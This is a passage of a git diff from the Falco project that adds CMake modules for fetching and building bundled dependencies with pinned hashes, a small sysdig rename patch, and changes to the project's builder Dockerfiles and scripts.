+    OUTPUT_VARIABLE out
+    ERROR_QUIET OUTPUT_STRIP_TRAILING_WHITESPACE)
+  if(res EQUAL 0)
+    set(${_var}
+        "CLEAN"
+        PARENT_SCOPE)
+  else()
+    set(${_var}
+        "DIRTY"
+        PARENT_SCOPE)
+  endif()
+endfunction()
--- a/cmake/modules/OpenSSL.cmake
+++ b/cmake/modules/OpenSSL.cmake
@@ -0,0 +1,42 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+if(NOT USE_BUNDLED_DEPS)
+  find_package(OpenSSL REQUIRED)
+  message(STATUS "Found openssl: include: ${OPENSSL_INCLUDE_DIR}, lib: ${OPENSSL_LIBRARIES}")
+  find_program(OPENSSL_BINARY openssl)
+  if(NOT OPENSSL_BINARY)
+    message(FATAL_ERROR "Couldn't find the openssl command line in PATH")
+  else()
+    message(STATUS "Found openssl: binary: ${OPENSSL_BINARY}")
+  endif()
+else()
+  set(OPENSSL_BUNDLE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl")
+  set(OPENSSL_INSTALL_DIR "${OPENSSL_BUNDLE_DIR}/target")
+  set(OPENSSL_INCLUDE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl/include")
+  set(OPENSSL_LIBRARY_SSL "${OPENSSL_INSTALL_DIR}/lib/libssl.a")
+  set(OPENSSL_LIBRARY_CRYPTO "${OPENSSL_INSTALL_DIR}/lib/libcrypto.a")
+  set(OPENSSL_BINARY "${OPENSSL_INSTALL_DIR}/bin/openssl")
+
+  message(STATUS "Using bundled openssl in '${OPENSSL_BUNDLE_DIR}'")
+
+  ExternalProject_Add(
+    openssl
+    # START CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
+    URL "https://github.com/openssl/openssl/archive/OpenSSL_1_0_2n.tar.gz"
+    URL_HASH "SHA256=4f4bc907caff1fee6ff8593729e5729891adcee412049153a3bb4db7625e8364"
+    # END CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
+    CONFIGURE_COMMAND ./config shared --prefix=${OPENSSL_INSTALL_DIR}
+    BUILD_COMMAND ${CMD_MAKE}
+    BUILD_IN_SOURCE 1
+    INSTALL_COMMAND ${CMD_MAKE} install)
+endif()
--- a/cmake/modules/cURL.cmake
+++ b/cmake/modules/cURL.cmake
@@ -0,0 +1,80 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+if(NOT USE_BUNDLED_DEPS)
+  find_package(CURL REQUIRED)
+  message(STATUS "Found CURL: include: ${CURL_INCLUDE_DIR}, lib: ${CURL_LIBRARIES}")
+else()
+  set(CURL_BUNDLE_DIR "${PROJECT_BINARY_DIR}/curl-prefix/src/curl")
+  set(CURL_INCLUDE_DIR "${CURL_BUNDLE_DIR}/include/")
+  set(CURL_LIBRARIES "${CURL_BUNDLE_DIR}/lib/.libs/libcurl.a")
+
+  if(NOT USE_BUNDLED_OPENSSL)
+    set(CURL_SSL_OPTION "--with-ssl")
+  else()
+    set(CURL_SSL_OPTION "--with-ssl=${OPENSSL_INSTALL_DIR}")
+    message(STATUS "Using bundled curl in '${CURL_BUNDLE_DIR}'")
+    message(STATUS "Using SSL for curl in '${CURL_SSL_OPTION}'")
+  endif()
+
+  externalproject_add(
+    curl
+    DEPENDS openssl
+    # START CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
+    URL "https://github.com/curl/curl/releases/download/curl-7_61_0/curl-7.61.0.tar.bz2"
+    URL_HASH "SHA256=5f6f336921cf5b84de56afbd08dfb70adeef2303751ffb3e570c936c6d656c9c"
+    # END CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
+    CONFIGURE_COMMAND
+      ./configure
+      ${CURL_SSL_OPTION}
+      --disable-shared
+      --enable-optimize
+      --disable-curldebug
+      --disable-rt
+      --enable-http
+      --disable-ftp
+      --disable-file
+      --disable-ldap
+      --disable-ldaps
+      --disable-rtsp
+      --disable-telnet
+      --disable-tftp
+      --disable-pop3
+      --disable-imap
+      --disable-smb
+      --disable-smtp
+      --disable-gopher
+      --disable-sspi
+      --disable-ntlm-wb
+      --disable-tls-srp
+      --without-winssl
+      --without-darwinssl
+      --without-polarssl
+      --without-cyassl
+      --without-nss
+      --without-axtls
+      --without-ca-path
+      --without-ca-bundle
+      --without-libmetalink
+      --without-librtmp
+      --without-winidn
+      --without-libidn2
+      --without-libpsl
+      --without-nghttp2
+      --without-libssh2
+      --disable-threaded-resolver
+      --without-brotli
+    BUILD_COMMAND ${CMD_MAKE}
+    BUILD_IN_SOURCE 1
+    INSTALL_COMMAND "")
+endif()
--- a/cmake/modules/gRPC.cmake
+++ b/cmake/modules/gRPC.cmake
@@ -0,0 +1,131 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+if(NOT USE_BUNDLED_DEPS)
+  # zlib
+  include(FindZLIB)
+  set(ZLIB_INCLUDE "${ZLIB_INCLUDE_DIRS}")
+  set(ZLIB_LIB "${ZLIB_LIBRARIES}")
+
+  if(ZLIB_INCLUDE AND ZLIB_LIB)
+    message(STATUS "Found zlib: include: ${ZLIB_INCLUDE}, lib: ${ZLIB_LIB}")
+  endif()
+
+  # c-ares
+  find_path(CARES_INCLUDE NAMES ares.h)
+  find_library(CARES_LIB NAMES libcares.so)
+  if(CARES_INCLUDE AND CARES_LIB)
+    message(STATUS "Found c-ares: include: ${CARES_INCLUDE}, lib: ${CARES_LIB}")
+  else()
+    message(FATAL_ERROR "Couldn't find system c-ares")
+  endif()
+
+  # protobuf
+  find_program(PROTOC NAMES protoc)
+  find_path(PROTOBUF_INCLUDE NAMES google/protobuf/message.h)
+  find_library(PROTOBUF_LIB NAMES libprotobuf.so)
+  if(PROTOC
+     AND PROTOBUF_INCLUDE
+     AND PROTOBUF_LIB)
+    message(STATUS "Found protobuf: compiler: ${PROTOC}, include: ${PROTOBUF_INCLUDE}, lib: ${PROTOBUF_LIB}")
+  else()
+    message(FATAL_ERROR "Couldn't find system protobuf")
+  endif()
+
+  # gpr
+  find_library(GPR_LIB NAMES gpr)
+
+  if(GPR_LIB)
+    message(STATUS "Found gpr lib: ${GPR_LIB}")
+  else()
+    message(FATAL_ERROR "Couldn't find system gpr")
+  endif()
+
+  # gRPC todo(fntlnz, leodido): check that gRPC version is greater or equal than 1.8.0
+  find_path(GRPCXX_INCLUDE NAMES grpc++/grpc++.h)
+  if(GRPCXX_INCLUDE)
+    set(GRPC_INCLUDE ${GRPCXX_INCLUDE})
+  else()
+    find_path(GRPCPP_INCLUDE NAMES grpcpp/grpcpp.h)
+    set(GRPC_INCLUDE ${GRPCPP_INCLUDE})
+    add_definitions(-DGRPC_INCLUDE_IS_GRPCPP=1)
+  endif()
+  find_library(GRPC_LIB NAMES grpc)
+  find_library(GRPCPP_LIB NAMES grpc++)
+  if(GRPC_INCLUDE
+     AND GRPC_LIB
+     AND GRPCPP_LIB)
+    message(STATUS "Found grpc: include: ${GRPC_INCLUDE}, C lib: ${GRPC_LIB}, C++ lib: ${GRPCPP_LIB}")
+  else()
+    message(FATAL_ERROR "Couldn't find system grpc")
+  endif()
+  find_program(GRPC_CPP_PLUGIN grpc_cpp_plugin)
+  if(NOT GRPC_CPP_PLUGIN)
+    message(FATAL_ERROR "System grpc_cpp_plugin not found")
+  endif()
+
+else()
+  find_package(PkgConfig)
+    if(NOT PKG_CONFIG_FOUND)
+      message(FATAL_ERROR "pkg-config binary not found")
+  endif()
+  message(STATUS "Found pkg-config executable: ${PKG_CONFIG_EXECUTABLE}")
+  set(GRPC_SRC "${PROJECT_BINARY_DIR}/grpc-prefix/src/grpc")
+  set(GRPC_INCLUDE "${GRPC_SRC}/include")
+  set(GRPC_LIBS_ABSOLUTE "${GRPC_SRC}/libs/opt")
+  set(GRPC_LIB "${GRPC_LIBS_ABSOLUTE}/libgrpc.a")
+  set(GRPCPP_LIB "${GRPC_LIBS_ABSOLUTE}/libgrpc++.a")
+  set(GRPC_CPP_PLUGIN "${GRPC_SRC}/bins/opt/grpc_cpp_plugin")
+
+  # we tell gRPC to compile protobuf for us because when a gRPC package is not available, like on CentOS, it's very
+  # likely that protobuf will be very outdated
+  set(PROTOBUF_INCLUDE "${GRPC_SRC}/third_party/protobuf/src")
+  set(PROTOC "${PROTOBUF_INCLUDE}/protoc")
+  set(PROTOBUF_LIB "${GRPC_LIBS_ABSOLUTE}/protobuf/libprotobuf.a")
+  # we tell gRPC to compile zlib for us because when a gRPC package is not available, like on CentOS, it's very likely
+  # that zlib will be very outdated
+  set(ZLIB_INCLUDE "${GRPC_SRC}/third_party/zlib")
+  set(ZLIB_LIB "${GRPC_LIBS_ABSOLUTE}/libz.a")
+
+  message(STATUS "Using bundled gRPC in '${GRPC_SRC}'")
+  message(
+    STATUS
+      "Bundled gRPC comes with protobuf: compiler: ${PROTOC}, include: ${PROTOBUF_INCLUDE}, lib: ${PROTOBUF_LIB}")
+  message(STATUS "Bundled gRPC comes with zlib: include: ${ZLIB_INCLUDE}, lib: ${ZLIB_LIB}}")
+  message(STATUS "Bundled gRPC comes with gRPC C++ plugin: include: ${GRPC_CPP_PLUGIN}")
+
+  get_filename_component(PROTOC_DIR ${PROTOC} PATH)
+
+  ExternalProject_Add(
+    grpc
+    DEPENDS openssl
+    GIT_REPOSITORY https://github.com/grpc/grpc.git
+    GIT_TAG v1.25.0
+    GIT_SUBMODULES "third_party/protobuf third_party/zlib third_party/cares/cares"
+    BUILD_IN_SOURCE 1
+    BUILD_BYPRODUCTS ${GRPC_LIB} ${GRPCPP_LIB}
+    INSTALL_COMMAND ""
+    CONFIGURE_COMMAND ""
+    BUILD_COMMAND
+      CFLAGS=-Wno-implicit-fallthrough
+      HAS_SYSTEM_ZLIB=false
+      HAS_SYSTEM_PROTOBUF=false
+      HAS_SYSTEM_CARES=false
+      PKG_CONFIG_PATH=${OPENSSL_BUNDLE_DIR}
+      PKG_CONFIG=${PKG_CONFIG_EXECUTABLE}
+      PATH=${PROTOC_DIR}:$ENV{PATH}
+      make
+      static_cxx
+      static_c
+      grpc_cpp_plugin)
+endif()
--- a/cmake/modules/jq.cmake
+++ b/cmake/modules/jq.cmake
@@ -0,0 +1,35 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+if(NOT USE_BUNDLED_DEPS)
+  find_path(JQ_INCLUDE jq.h PATH_SUFFIXES jq)
+  find_library(JQ_LIB NAMES jq)
+  if(JQ_INCLUDE AND JQ_LIB)
+    message(STATUS "Found jq: include: ${JQ_INCLUDE}, lib: ${JQ_LIB}")
+  else()
+    message(FATAL_ERROR "Couldn't find system jq")
+  endif()
+else()
+  set(JQ_SRC "${PROJECT_BINARY_DIR}/jq-prefix/src/jq")
+  message(STATUS "Using bundled jq in '${JQ_SRC}'")
+  set(JQ_INCLUDE "${JQ_SRC}")
+  set(JQ_LIB "${JQ_SRC}/.libs/libjq.a")
+  ExternalProject_Add(
+    jq
+    URL "https://github.com/stedolan/jq/releases/download/jq-1.5/jq-1.5.tar.gz"
+    URL_HASH "SHA256=c4d2bfec6436341113419debf479d833692cc5cdab7eb0326b5a4d4fbe9f493c"
+    CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
+    BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
+    BUILD_IN_SOURCE 1
+    PATCH_COMMAND curl -L https://github.com/stedolan/jq/commit/8eb1367ca44e772963e704a700ef72ae2e12babd.patch | patch
+    INSTALL_COMMAND "")
+endif()
--- a/cmake/modules/sysdig-repo/CMakeLists.txt
+++ b/cmake/modules/sysdig-repo/CMakeLists.txt
@@ -0,0 +1,28 @@
+#
+# Copyright (C) 2019 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+cmake_minimum_required(VERSION 3.5.1)
+
+project(sysdig-repo NONE)
+
+include(ExternalProject)
+message(STATUS "Driver version: ${SYSDIG_VERSION}")
+
+ExternalProject_Add(
+  sysdig
+  URL "https://github.com/draios/sysdig/archive/${SYSDIG_VERSION}.tar.gz"
+  URL_HASH "${SYSDIG_CHECKSUM}"
+  CONFIGURE_COMMAND ""
+  BUILD_COMMAND ""
+  INSTALL_COMMAND ""
+  TEST_COMMAND ""
+  PATCH_COMMAND patch -p1 -i ${CMAKE_CURRENT_SOURCE_DIR}/patch/libscap.patch)
--- a/cmake/modules/sysdig-repo/patch/libscap.patch
+++ b/cmake/modules/sysdig-repo/patch/libscap.patch
@@ -0,0 +1,31 @@
+diff --git a/userspace/libscap/scap.c b/userspace/libscap/scap.c
+index e9faea51..a1b3b501 100644
+--- a/userspace/libscap/scap.c
+++ b/userspace/libscap/scap.c
+@@ -52,7 +52,7 @@ limitations under the License.
+ //#define NDEBUG
+ #include <assert.h>
+ 
+-static const char *SYSDIG_BPF_PROBE_ENV = "SYSDIG_BPF_PROBE";
+static const char *SYSDIG_BPF_PROBE_ENV = "FALCO_BPF_PROBE";
+ 
+ //
+ // Probe version string size
+@@ -171,7 +171,7 @@ scap_t* scap_open_live_int(char *error, int32_t *rc,
+ 				return NULL;
+ 			}
+ 
+-			snprintf(buf, sizeof(buf), "%s/.sysdig/%s-bpf.o", home, PROBE_NAME);
+			snprintf(buf, sizeof(buf), "%s/.falco/%s-bpf.o", home, PROBE_NAME);
+ 			bpf_probe = buf;
+ 		}
+ 	}
+@@ -1808,7 +1808,7 @@ int32_t scap_disable_dynamic_snaplen(scap_t* handle)
+ 
+ const char* scap_get_host_root()
+ {
+-	char* p = getenv("SYSDIG_HOST_ROOT");
+	char* p = getenv("HOST_ROOT");
+ 	static char env_str[SCAP_MAX_PATH_SIZE + 1];
+ 	static bool inited = false;
+ 	if (! inited) {
--- a/cmake/modules/sysdig.cmake
+++ b/cmake/modules/sysdig.cmake
@@ -0,0 +1,68 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+set(SYSDIG_CMAKE_SOURCE_DIR "${CMAKE_CURRENT_SOURCE_DIR}/cmake/modules/sysdig-repo")
+set(SYSDIG_CMAKE_WORKING_DIR "${CMAKE_BINARY_DIR}/sysdig-repo")
+
+# this needs to be here at the top
+if(USE_BUNDLED_DEPS)
+  # explicitly force this dependency to use the bundled OpenSSL
+  set(USE_BUNDLED_OPENSSL ON)
+endif()
+
+file(MAKE_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
+
+# The sysdig git reference (branch name, commit hash, or tag)
+# To update sysdig version for the next release, change the default below
+# In case you want to test against another sysdig version just pass the variable - ie., `cmake -DSYSDIG_VERSION=dev ..`
+if(NOT SYSDIG_VERSION)
+  set(SYSDIG_VERSION "85c88952b018fdbce2464222c3303229f5bfcfad")
+  set(SYSDIG_CHECKSUM "SHA256=6c3f5f2d699c9540e281f50cbc5cb6b580f0fc689798bc65d4a77f57f932a71c")
+endif()
+set(PROBE_VERSION "${SYSDIG_VERSION}")
+
+# cd /path/to/build && cmake /path/to/source
+execute_process(COMMAND "${CMAKE_COMMAND}" -DSYSDIG_VERSION=${SYSDIG_VERSION} -DSYSDIG_CHECKSUM=${SYSDIG_CHECKSUM} ${SYSDIG_CMAKE_SOURCE_DIR} WORKING_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
+
+
+# todo(leodido, fntlnz) > use the following one when CMake version will be >= 3.13
+
+# execute_process(COMMAND "${CMAKE_COMMAND}" -B ${SYSDIG_CMAKE_WORKING_DIR} WORKING_DIRECTORY
+# "${SYSDIG_CMAKE_SOURCE_DIR}")
+
+execute_process(COMMAND "${CMAKE_COMMAND}" --build . WORKING_DIRECTORY "${SYSDIG_CMAKE_WORKING_DIR}")
+set(SYSDIG_SOURCE_DIR "${SYSDIG_CMAKE_WORKING_DIR}/sysdig-prefix/src/sysdig")
+
+# jsoncpp
+set(JSONCPP_SRC "${SYSDIG_SOURCE_DIR}/userspace/libsinsp/third-party/jsoncpp")
+set(JSONCPP_INCLUDE "${JSONCPP_SRC}")
+set(JSONCPP_LIB_SRC "${JSONCPP_SRC}/jsoncpp.cpp")
+
+# Add driver directory
+add_subdirectory("${SYSDIG_SOURCE_DIR}/driver" "${PROJECT_BINARY_DIR}/driver")
+
+# Add libscap directory
+add_definitions(-D_GNU_SOURCE)
+add_definitions(-DHAS_CAPTURE)
+add_subdirectory("${SYSDIG_SOURCE_DIR}/userspace/libscap" "${PROJECT_BINARY_DIR}/userspace/libscap")
+
+# Add libsinsp directory
+add_subdirectory("${SYSDIG_SOURCE_DIR}/userspace/libsinsp" "${PROJECT_BINARY_DIR}/userspace/libsinsp")
+add_dependencies(sinsp tbb b64 luajit)
+
+# explicitly disable the tests of this dependency
+set(CREATE_TEST_TARGETS OFF)
+
+if(USE_BUNDLED_DEPS)
+  add_dependencies(scap grpc curl jq)
+endif()
--- a/cmake/modules/yaml-cpp.cmake
+++ b/cmake/modules/yaml-cpp.cmake
@@ -0,0 +1,32 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+if(NOT USE_BUNDLED_DEPS)
+  find_path(YAMLCPP_INCLUDE_DIR NAMES yaml-cpp/yaml.h)
+  find_library(YAMLCPP_LIB NAMES yaml-cpp)
+  if(YAMLCPP_INCLUDE_DIR AND YAMLCPP_LIB)
+    message(STATUS "Found yamlcpp: include: ${YAMLCPP_INCLUDE_DIR}, lib: ${YAMLCPP_LIB}")
+  else()
+    message(FATAL_ERROR "Couldn't find system yamlcpp")
+  endif()
+else()
+  set(YAMLCPP_SRC "${PROJECT_BINARY_DIR}/yamlcpp-prefix/src/yamlcpp")
+  message(STATUS "Using bundled yaml-cpp in '${YAMLCPP_SRC}'")
+  set(YAMLCPP_LIB "${YAMLCPP_SRC}/libyaml-cpp.a")
+  set(YAMLCPP_INCLUDE_DIR "${YAMLCPP_SRC}/include")
+  ExternalProject_Add(
+    yamlcpp
+    URL "https://github.com/jbeder/yaml-cpp/archive/yaml-cpp-0.6.2.tar.gz"
+    URL_HASH "SHA256=e4d8560e163c3d875fd5d9e5542b5fd5bec810febdcba61481fe5fc4e6b1fd05"
+    BUILD_IN_SOURCE 1
+    INSTALL_COMMAND "")
+endif()
--- a/docker/OWNERS
+++ b/docker/OWNERS
@@ -0,0 +1,6 @@
+labels:
+  - area/integration
+approvers:
+  - leogr
+reviewers:
+  - leogr
--- a/docker/README.md
+++ b/docker/README.md
@@ -0,0 +1,17 @@
+# Falco Dockerfiles
+
+This directory contains various ways to package Falco as a container and related tools. 
+
+## Currently Supported Images
+
+| Name | Directory | Description |
+|---|---|---|
+| [falcosecurity/falco:latest](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/falco | Falco (DEB built from git tag or from the master) with all the building toolchain. | 
+| [falcosecurity/falco-driver-loader:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader), [falcosecurity/falco-driver-loader:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader), [falcosecurity/falco-driver-loader:master](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader) | docker/driver-loader | `falco-driver-loader` as entrypoint with the building toolchain. | 
+| [falcosecurity/falco-no-driver:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-no-driver), [falcosecurity/falco-no-driver:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco-no-driver),[falcosecurity/falco-no-driver:master](https://hub.docker.com/repository/docker/falcosecurity/falco-no-driver) | docker/no-driver | Falco (TGZ built from git tag or from the master) without the building toolchain. | 
+| [falcosecurity/falco-builder:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-builder) | docker/builder | The complete build tool chain for compiling Falco from source. See [the documentation](https://falco.org/docs/source/) for more details on building from source. Used to build Falco (CI). | 
+| [falcosecurity/falco-tester:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-tester) | docker/tester | Container image for running the Falco test suite. Used to run Falco integration tests (CI). | 
+| _to not be published_ | docker/local | Built on-the-fly and used by falco-tester. |
+
+> Note: `falco-builder`, `falco-tester` (and the `docker/local` image that it's built on the fly) are not integrated into the release process because they are development and CI tools that need to be manually pushed only when updated.
+
--- a/docker/builder/Dockerfile
+++ b/docker/builder/Dockerfile
@@ -2,7 +2,7 @@ FROM centos:7

 LABEL name="falcosecurity/falco-builder"
 LABEL usage="docker run -v $PWD/..:/source -v $PWD/build:/build falcosecurity/falco-builder cmake"
-LABEL maintainer="opensource@sysdig.com"
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"

 ARG BUILD_TYPE=release
 ARG BUILD_DRIVER=OFF
@@ -18,15 +18,14 @@ ENV BUILD_WARNINGS_AS_ERRORS=${BUILD_WARNINGS_AS_ERRORS}
 ENV MAKE_JOBS=${MAKE_JOBS}
 ENV FALCO_VERSION=${FALCO_VERSION}

-ARG DOCKER_VERSION=1.11.0
-ARG CMAKE_VERSION=3.5.0
-
+# build toolchain
 RUN yum -y install centos-release-scl && \
-    INSTALL_PKGS="devtoolset-7-gcc devtoolset-7-gcc-c++ devtoolset-7-toolchain devtoolset-7-libstdc++-devel devtoolset-7-elfutils-libelf-devel glibc-static autoconf automake libtool createrepo expect git which libcurl-devel zlib-devel rpm-build" && \
+    INSTALL_PKGS="devtoolset-7-gcc devtoolset-7-gcc-c++ devtoolset-7-toolchain devtoolset-7-libstdc++-devel devtoolset-7-elfutils-libelf-devel llvm-toolset-7 glibc-static autoconf automake libtool createrepo expect git which libcurl-devel zlib-devel ncurses-devel rpm-build libyaml-devel" && \
    yum -y install --setopt=tsflags=nodocs $INSTALL_PKGS && \
    rpm -V $INSTALL_PKGS

-RUN source scl_source enable devtoolset-7 && \
+ARG CMAKE_VERSION=3.5.1
+RUN source scl_source enable devtoolset-7 llvm-toolset-7 && \
    cd /tmp && \
    curl -L https://github.com/kitware/cmake/releases/download/v${CMAKE_VERSION}/cmake-${CMAKE_VERSION}.tar.gz | tar xz; \
    cd cmake-${CMAKE_VERSION} && \
@@ -35,9 +34,6 @@ RUN source scl_source enable devtoolset-7 && \
    make install && \
    rm -rf /tmp/cmake-${CMAKE_VERSION}

-# fixme: deps needs a fix into CMakeLists.txt
-RUN yum -y install libyaml-devel && yum clean all -y
-
 COPY ./root /

 # DTS
--- a/docker/builder/root/usr/bin/entrypoint
+++ b/docker/builder/root/usr/bin/entrypoint
@@ -21,11 +21,7 @@ esac

 case "$CMD" in
 "cmake")
-    # Check that source directory contains Falco and Sysdig
-    if [ ! -d "$SOURCE_DIR/sysdig" ]; then
-        echo "Missing sysdig source." >&2
-        exit 1
-    fi
+    # Check that source directory contains Falco
    if [ ! -d "$SOURCE_DIR/falco" ]; then
        echo "Missing falco source." >&2
        exit 1
@@ -42,6 +38,7 @@ case "$CMD" in
    -DBUILD_WARNINGS_AS_ERRORS="$BUILD_WARNINGS_AS_ERRORS" \
    -DFALCO_VERSION="$FALCO_VERSION" \
    -DDRAIOS_DEBUG_FLAGS="$DRAIOS_DEBUG_FLAGS" \
+    -DUSE_BUNDLED_DEPS=ON \
    "$SOURCE_DIR/falco"
    exit "$(printf '%d\n' $?)"
    ;;
--- a/docker/builder/root/usr/bin/scl_enable
+++ b/docker/builder/root/usr/bin/scl_enable
@@ -3,4 +3,4 @@
 #
 # This will make scl collection binaries work out of box.
 unset BASH_ENV PROMPT_COMMAND ENV
-source scl_source enable devtoolset-7
+source scl_source enable devtoolset-7 llvm-toolset-7
--- a/docker/builder/root/usr/bin/usage
+++ b/docker/builder/root/usr/bin/usage
@@ -3,6 +3,7 @@
 gccversion=$(gcc --version | head -n1)
 cppversion=$(g++ -dM -E -x c++ /dev/null | grep -F __cplusplus | cut -d' ' -f3)
 cmakeversion=$(cmake --version | head -n1)
+clangversion=$(clang --version | head -n1)

 cat <<EOF
 Hello, this is the Falco builder container.
@@ -17,7 +18,7 @@ How to use.
    * docker run -ti falcosecurity/falco-builder bash

    To build Falco it needs:
-    - a bind-mount on the source directory (ie., the directory containing falco and sysdig source as siblings)
+    - a bind-mount on the source directory (ie., the directory containing Falco and sysdig source as siblings)

    Optionally, you can also bind-mount the build directory.
    So, you can execute it from the Falco root directory as follows.
@@ -48,4 +49,5 @@ Environment.
    * ${gccversion}
    * cplusplus ${cppversion}
    * ${cmakeversion}
-EOF
+    * ${clangversion}
+EOF
--- a/docker/dev/Dockerfile
+++ b/docker/dev/Dockerfile
@@ -1,110 +0,0 @@
-FROM debian:unstable
-
-LABEL maintainer="Sysdig <support@sysdig.com>"
-
-ENV FALCO_REPOSITORY dev
-
-LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
-
-ENV SYSDIG_HOST_ROOT /host
-
-ENV HOME /root
-
-RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
-
-ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
-
-RUN apt-get update \
- && apt-get install -y --no-install-recommends \
-	bash-completion \
-	bc \
-	clang-7 \
-	ca-certificates \
-	curl \
-	dkms \
-	gnupg2 \
-	gcc \
-	gdb \
-	jq \
-	libc6-dev \
-	libelf-dev \
-	llvm-7 \
-	netcat \
-	xz-utils \
- && rm -rf /var/lib/apt/lists/*
-
-# gcc 6 is no longer included in debian unstable, but we need it to
-# build kernel modules on the default debian-based ami used by
-# kops. So grab copies we've saved from debian snapshots with the
-# prefix https://snapshot.debian.org/archive/debian/20170517T033514Z
-# or so.
-
-RUN curl -o cpp-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/cpp-6_6.3.0-18_amd64.deb \
-    && curl -o gcc-6-base_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6-base_6.3.0-18_amd64.deb \
-    && curl -o gcc-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6_6.3.0-18_amd64.deb \
-    && curl -o libasan3_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libasan3_6.3.0-18_amd64.deb \
-    && curl -o libcilkrts5_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libcilkrts5_6.3.0-18_amd64.deb \
-    && curl -o libgcc-6-dev_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libgcc-6-dev_6.3.0-18_amd64.deb \
-    && curl -o libubsan0_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libubsan0_6.3.0-18_amd64.deb \
